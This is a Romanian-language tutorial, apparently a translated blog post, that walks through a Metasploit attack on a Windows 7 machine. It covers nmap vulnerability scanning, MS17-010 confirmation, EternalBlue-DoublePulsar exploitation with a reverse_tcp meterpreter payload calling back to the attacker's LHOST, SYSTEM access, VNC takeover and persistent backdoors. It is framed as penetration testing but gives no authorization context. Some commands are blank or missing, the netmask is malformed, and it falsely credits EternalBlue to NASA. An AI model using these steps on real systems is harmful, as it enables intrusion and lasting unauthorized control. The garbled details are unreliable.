Așa cum am discutat TOP 25 BEST KALI LINUX TOOL, și am pus METASPLOIT pe primul loc în listă, acum haideți să discutăm și să învățăm despre METASPLOIT. Vă recomandăm să fiți familiarizați cu Metasploit.
Metasploit a fost creat inițial de H. D Moore în 2003, până când a fost achiziționat și dezvoltat în continuare de Rapid7 pe 21 octombrie 2009. Metasploit-framework este complet scris folosind Ruby și este un pachet standard instalat în sistemul Kali Linux (și, de asemenea, aproape toate sistemele de operare pentru teste de penetrare, cred). Este kitul preferat al hackerilor sau al testelor de penetrare pentru a cerceta vulnerabilitățile de securitate, a dezvolta și a executa exploit-uri pe ținte și alte dezvoltări de securitate.
Metasploit vine cu mai multe ediții, în general împărțite în două categorii, versiunea gratuită și versiunea cu plată. Versiunile gratuite: Metasploit Framework Community Edition (interfață bazată pe CLI) și Armitage (interfață bazată pe GUI). Versiunile cu plată : Metasploit Express, Metasploit Pro și Cobalt Strike (este similar cu Armitage, care este furnizat de Strategic Cyber LLC).
Metasploit permite utilizatorilor să creeze (sau să dezvolte) propriul cod de exploatare, dar nu vă faceți griji dacă nu știți să codificați, Metasploit are atât de multe module și acestea sunt actualizate continuu. În prezent, Metasploit are peste 1600 de exploit-uri și 500 de sarcini utile. În mod simplu, pentru a înțelege ce sunt exploatările și încărcăturile utile, un exploit este practic modul în care atacatorul livrează încărcătura utilă, prin gaura de vulnerabilitate a sistemului țintă. Odată ce atacatorul lansează exploit-ul care conține o încărcătură utilă împotriva țintei vulnerabile, apoi încărcătura utilă implementată (încărcătură utilă utilizată pentru a se conecta înapoi la atacator pentru a obține acces de la distanță la sistemul țintă), în această etapă exploit-ul este finalizat și devine irelevant.
„Metasploit nu este un instrument instant de hacking, este un cadru nebunesc”
Acest articol Metasploit se referă la efectuarea de teste de penetrare împotriva unui sistem țintă folosind următorul flux:
- Vulnerability Scanning
- Vulnerability Assessment
- Exploiting
- Câștigarea accesului de la distanță – stăpânirea sistemului
PREPARARE
Asigurați-vă că Kali Linux-ul nostru are cea mai recentă versiune actualizată. Vor exista îmbunătățiri în cadrul fiecărei actualizări. Rulați următoarele comenzi:
~# apt upgrade -y
~# apt dist-upgrade -y
După ce mașina noastră este la zi, acum să începem prin a porni consola metasploit. În terminal, tastați:
Și, de asemenea, aveți nevoie de orice editor de text, Gedit sau Leafpad, pentru a colecta câteva informații pe parcurs înainte de a compila atacul. În primul rând, identificați adresa IP a interfeței wireless, IP-ul routerului și masca de rețea.
Bazându-ne pe informațiile de mai sus, notăm adresa IP a WLAN1 și a routerului, precum și masca de rețea. Așadar, nota ar trebui să arate astfel:
Attacker IP (LHOST): 192.168.1.56
Gateway / IP-ul routerului: 192.168.1.1
Netmask: 255.255.255.255.0(/24)
PASUL 1 : SCANARE DE VULNERABILITATE
În consola metasploit, adunăm apoi mai întâi informații, cum ar fi adresa IP a țintei, sistemul de operare, porturile deschise și vulnerabilitatea. Metasploit ne permite să rulăm NMap direct din consolă. Pe baza informațiilor de mai sus, executăm această comandă pentru a ne îndeplini sarcina de colectare a informațiilor.
msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O
Din comanda de mai sus am obținut rezultatul de mai jos.
Am obținut o țintă vulnerabilă care rulează sistemul de operare Windows, iar vulnerabilitatea este pe serviciul SMBv1. Așadar, adăugați la notă.
Target IP (RHOST): 192.168.1.57
Vulnerabilitate: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
STEP 2 : VULNERABILITY ASSESSMENT
Acum cunoaștem ținta și vulnerabilitatea acesteia. Să verificăm vulnerabilitatea în consola metasploit
Acum cunoaștem ținta și vulnerabilitatea acesteia. Să verificăm vulnerabilitatea în consola metasploit folosind modulul auxiliar smb_scanner. Rulați următoarea comandă:
msf auxiliary(smb_ms17_010) > set RHOSTS
msf auxiliary(smb_ms17_010) > run
Metasploit este încrezător cu privire la vulnerabilitate și arată ediția exactă a sistemului de operare Windows. Adaugă la notă:
Target OS: Windows 7 Ultimate 7600
ETAPA 3 : EXPLOATAREA
Din păcate, metasploit nu are niciun modul de exploatare legat de această vulnerabilitate. Dar, nu vă faceți griji, există un tip în afara expus și a scris codul de exploatare. Exploatarea este familiară, deoarece este inițiată de NASA, se numește EternalBlue-DoublePulsar. Îl puteți lua de aici, sau puteți urma ghidul din tutorialul video de mai jos pentru a instala codul de exploatare în cadrul metasploit.
După ce ați urmat de-a lungul ghidului de mai sus, (asigurați-vă că calea este aceeași cu cea din tutorial). Acum, sunteți gata să exploatați ținta. Rulați următoarele comenzi:
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.57
set LHOST 192.168.1.56
Exploit
Boom… Exploit-ul a reușit, am obținut sesiunea meterpreter. Așa cum am menționat mai devreme, odată ce exploit-ul a fost lansat, acesta va implementa încărcătura utilă, care este, aici am folosit, windows/meterpreter/reverse_tcp.
PASUL 4 : OBȚINEREA ACCESULUI DE LA DISTANȚĂ
Să explorăm mai multe comenzi disponibile, introduceți ‘?’ (fără semnul întrebării) și vedeți comenzile disponibile enumerate. Stdapi, comenzile de sistem sunt:
Pentru a vedea mai multe informații despre sistemul țintă, utilizați comanda ‘sysinfo’. Ieșirea ar trebui să arate astfel:
Din moment ce ne-am injectat mai devreme în procesul de sistem (spoolsv.exe), am obținut System Privilege. Noi deținem ținta. Putem face multe cu comanda către țintă. De exemplu, am putea rula RDP, sau pur și simplu am putea seta VNC remote. Pentru a rula serviciul VNC, introduceți comanda:
Rezultatul ar trebui să fie desktop-ul mașinii țintă, care arată astfel.
Cea mai importantă parte este crearea unui backdoor, astfel încât ori de câte ori ținta se deconectează de la mașina noastră, mașina țintă va încerca să se conecteze înapoi, din nou la noi. Backdooring-ul este folosit pentru a menține accesul, este ca la pescuit, nu vei arunca peștele înapoi în apă odată ce ai prins peștele, nu-i așa? Doriți să faceți ceva cu peștele, fie că îl păstrați în frigider pentru acțiuni ulterioare, cum ar fi gătitul, fie că îl vindeți pentru bani.
Meterpreter are această funcție de backdooring persistent. Rulați următoarea comandă și aruncați o privire la parametrii și argumentele disponibile.
meterpreter > run persistence -h
Dacă nu vă simțiți confortabil cu acest script depreciat, cel mai nou modul de persistență se află sub post/windows/manage/persistence_exe. Îl puteți explora mai departe de unul singur.
Metasploit este imens,nu este doar un instrument, este un cadru, considerați că are peste 1600 de exploit-uri și aproximativ 500 de sarcini utile. Un articol se potrivește doar pentru imaginea de ansamblu a utilizării sau ideii generale. Dar, ați învățat atât de multe din acest articol.
„Cu cât urmăriți mai mult fluxul de atac, cu atât mai mult aveți o provocare fără efort.”
.